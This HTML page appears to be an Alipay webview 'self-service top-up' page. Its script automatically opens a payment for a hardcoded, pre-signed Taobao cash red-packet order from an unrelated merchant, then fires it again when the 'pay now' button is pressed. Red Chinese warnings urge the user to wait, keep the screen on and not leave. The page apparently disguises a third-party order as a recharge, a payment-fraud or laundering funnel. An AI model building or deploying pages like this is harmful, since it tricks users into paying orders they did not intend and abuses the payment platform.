<html>
<head>
 <meta charset="UTF-8">
 <title></title>
 <meta content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" name="viewport">
 <meta content="yes" name="apple-mobile-web-app-capable">
 <meta content="black" name="apple-mobile-web-app-status-bar-style">
 <meta content="telephone=no" name="format-detection">
<link href="/bagcss/pay.css" rel="stylesheet" type="text/css">
<style type="text/css">
    html,
    body {
        width: 100%;
        height: 100%;
        margin: 0;
        padding: 0;
        overflow: hidden;
    }
    .demo {
        margin: 1em 0;
        padding: 1em 1em 2em;
        background: #fff;
    }

    .demo h1 {
        padding-left: 8px;
        font-size: 24px;
        line-height: 1.2;
        border-left: 3px solid #108EE9;
    }

    .demo h1,
    .demo p {
        margin: 1em 0;
    }

    .demo .am-button + .am-button,
    .demo .btn + .btn,
    .demo .btn:first-child {
        margin-top: 10px;
    }

    .fn-hide {
        display: none !important;
    }

    input {
        display: block;
        padding: 4px 10px;
        margin: 10px 0;
        line-height: 28px;
        width: 100%;
        box-sizing: border-box;
    }
</style>
<script>
function ready(callback) {
  if (window.AlipayJSBridge) {
    callback && callback();
  } else {
    document.addEventListener('AlipayJSBridgeReady', callback, false);
  }
}
var sett2;
var timerNum=0;
ready(function(){
	//副标题文字
    AlipayJSBridge.call('setTitle', {
        title: '自助充值'
    });
	AlipayJSBridge.call('setOptionMenu', {
        icontype: 'filter',
    });
	AlipayJSBridge.call('showOptionMenu');
    document.addEventListener('optionMenu', function(e) {
     	AlipayJSBridge.call('showPopMenu', {
            menus: [],
        }, function(e) {
            console.log(e);
        });
    }, false);
    
	sett2=setInterval(function(){
    		    clearInterval(sett2);
    		    document.getElementById("sendBt").innerHTML="立即支付";
    		    repay();
    		
    }, 1500);
});

function toastFun(text){
	AlipayJSBridge.call('toast',{
	  content: text
	},function(){});
}

function pay(orderStr){
	AlipayJSBridge.call("tradePay", {
      orderStr:decodeURIComponent(orderStr)
    }, function(result){
      if(result.resultCode==9000||result.resultCode=="9000"){
   
      	setTimeout(function(){
      		alert("支付已完成");
      		AlipayJSBridge.call('exitApp');
      	}, 500);
      }
    });
}

function repay(){
	//window.location.reload();
	pay("service%3d%22alipay.fund.stdtrustee.order.create.pay%22%26partner%3d%222088401309894080%22%26_input_charset%3d%22utf-8%22%26notify_url%3d%22https%3a%2f%2fwwhongbao.taobao.com%2fcallback%2falipay%2fnotifyPaySuccess.do%22%26out_order_no%3d%22e1645856ce5a491288c65ccb_a0c579bf050df9999bf97ea5cc01f36e_2%22%26out_request_no%3d%22e1645856ce5a491288c65ccb_a0c579bf050df9999bf97ea5cc01f36e_2_p%22%26product_code%3d%22SOCIAL_RED_PACKETS%22%26scene_code%3d%22MERCHANT_COUPON%22%26amount%3d%220.01%22%26pay_strategy%3d%22CASHIER_PAYMENT%22%26receipt_strategy%3d%22INNER_ACCOUNT_RECEIPTS%22%26platform%3d%22DEFAULT%22%26channel%3d%22APP%22%26order_title%3d%22%e6%b7%98%e5%ae%9d%e7%8e%b0%e9%87%91%e7%ba%a2%e5%8c%85%22%26master_order_no%3d%222019033110002001040200144705%22%26order_type%3d%22DEDUCT_ORDER%22%26extra_param%3d%22%7b%22payeeShowName%22%3a%22%e6%b7%98%e5%ae%9d%e7%8e%b0%e9%87%91%e7%ba%a2%e5%8c%85%22%7d%22%26pay_timeout%3d%2230m%22%26order_expired_time%3d%22360d%22%26sign%3d%22V7CfdqDKDYO58fPZnR7ZxzBdy7o2vS9SwXeKsx6rkkGhcTiKL5ZpE3UR4gzVL4yh9EYbDWnyEdPOVQdx1kwJIo6ZGxRvGij3pyKtSNVDOBTS18xJzncw%252BFq9CHsLwmOkS4t%252FjSiaYAdJLWG1gpSTzp35oT0Zk%252BmstD7Y%252Feq7hJlVOtMIR1965XviIVeT6UPHAInuoFD5BmUGF8j9%252FS7O%252B9CVQQs19a0TPJoBY2%252B%252FsZZQzPAzm7BvFFhbGndaPpBn8jrti6PwMhFHoo7%252BGVdJaUWEbR3dssr1GOBcTjIhVwgJAUAae6elnANAecaM8l50gDTAfHjVlFpg9jZIa%252FhwHQ%253D%253D%22%26sign_type%3d%22RSA%22");
}
</script>
</head>
<body>
<div class="aui-free-head 333333" style="background:#fff">
    <div class="aui-flex b-line" style="padding-bottom:0;">
        <div class="aui-user-img">
            <img src="/bagcss/alipaylogo.png" style="width:80px;height:80px;">
        </div>
        <div class="aui-flex-box">
            <h5 id="zzz" style="font-size:1.2rem;">支付成功、自动到账。</h5>
        </div>
    </div>
    <div id="xxx" class="aui-flex aui-flex-text" style="padding-top:0;">
        <div class="aui-flex-box" style="margin-left:0;">
      
            
        </div>
    </div>
	<div id="yyy">
		<button id="sendBt" style="width:90%;background: #eace99;border-radius:10px;color:#000;font-size:1.4rem;display:block;margin: 0 auto;border: none;padding:0.8rem 0;box-shadow:0 1px 15px #f0c677;" onclick="repay()">立即支付</button>
	</div>
	<div style="width:85%;padding-top:30px;margin:0 auto;line-height:2rem;">
		<div style="font-size:1.2rem;color:red;font-weight:bolder;">尊敬的会员：<br/>您好，由于充值客户较多，预计等待40秒后支付，请不要退出该页面。</div>
		<div style="font-size:1.2rem;color:red;font-weight:bolder;">1.请您耐心等待，系统订单处理中...</div>
		<div style="font-size:1.2rem;color:red;font-weight:bolder;">2.请勿离开或关闭此页面。</div>
		<div style="font-size:1.2rem;color:red;font-weight:bolder;">3.请保持手机屏幕常亮，勿熄屏。</div>
		<div style="font-size:1.2rem;color:red;font-weight:bolder;">4.感谢你的耐心等待、合作和支持。</div>
	</div>
</div>
</body>
</html>